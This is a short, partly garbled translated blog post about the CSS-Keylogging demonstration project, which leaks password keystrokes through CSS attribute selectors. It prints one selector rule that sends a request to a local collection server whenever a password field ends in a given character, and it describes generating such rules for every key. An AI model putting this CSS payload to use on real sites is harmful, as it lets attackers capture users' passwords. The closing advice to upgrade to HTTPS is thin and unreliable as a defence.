preface

On my first day of work in the New Year, I found an interesting project called CSS-Keylogging on Github. It is a demonstration of how to use CSS to retrieve passwords entered by users. This project is similar to CrookedStyleSheets, another popular project from a month or two ago, and it’s even possible that CSS-Keylogging was inspired by CrookedStyleSheets.

Different CSS

Said to CSS, most people’s first impression is basically used to configure the interface style, even be called a language, but with the constant development of web technology, it has the ability is improving little by little every day new, is no longer at the beginning that only meet the demand of the basic layout of the cascading style sheets (CSS), as for the new attribute function point, the author also know is not complete, I can’t do it here.

CrookedStyleSheets (Http://www.jbtronics, Github) CrookedStyleSheets (http://www.jbtronics, Github) CrookedStyleSheets Skip the rest of this article if you’ve already seen it.

CSS listens for keyloggers

The CSS-Keylogging project uses CSS to listen for keyloggers in the same way, mostly through CSS selectors. Css-keylogging uses multiple selectors more subtly to capture key events.

The core code is as follows:

input[type="password"][value$="1"] { background-image: url("http://localhost:3000/1"); }Copy the code

The explanation is as follows:

When the last character of the input box type ‘password’ is’ 1 ‘, use the background image with the URL http://localhost:3000/1. CSS will try to get the resource in this case. In this case, The server can receive the GET request sent to the client.

When value$=”1″, we can listen for 1. If we listen for all key characters on the keyboard, we can listen for all key characters on the keyboard. The answer is yes. The project uses the GO script to iterate through the ASCII code table and capture all keystrokes that can be entered on the keyboard, generating the following style sheet:

You can also use NodeJS to generate stylesheets, but I don’t know why the author used Node to build the server and then used GO to write the script. Students who are interested can clone projects and run them.

conclusion

To avoid intentional hijacked injection, upgrade HTTPS as soon as possible to prevent this from happening. Network security is everywhere, and I hope you don’t selectively ignore it.

MINFIVE
Blog.minfive.com/2018/02/23/…
30S code snippet translation